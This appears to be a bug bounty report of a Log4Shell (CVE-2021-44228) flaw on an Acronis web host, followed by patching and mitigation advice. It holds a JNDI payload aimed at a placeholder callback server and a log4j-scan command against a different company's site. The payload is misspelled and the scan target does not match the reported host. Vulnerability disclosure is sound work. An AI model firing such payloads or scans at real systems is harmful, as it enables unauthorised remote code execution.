The website at nps.acronis.com is vulnerable to CVE-2021-44228
I used this script to find this. It spins up an interact-sh server to receive the callback and send the payload in the query string and about 30 diffent headers. You can reproduce manually with curl and interact-sh/burp collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them.
${jdni:ldap://nps.acronis.com.<your-server>/test}
python3 log4j-scan.py -u 'https://marketingportal.engelvoelkers.com'
{F1544482}
Update log4j to the latest version
If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.
Remote Code Execution (rce)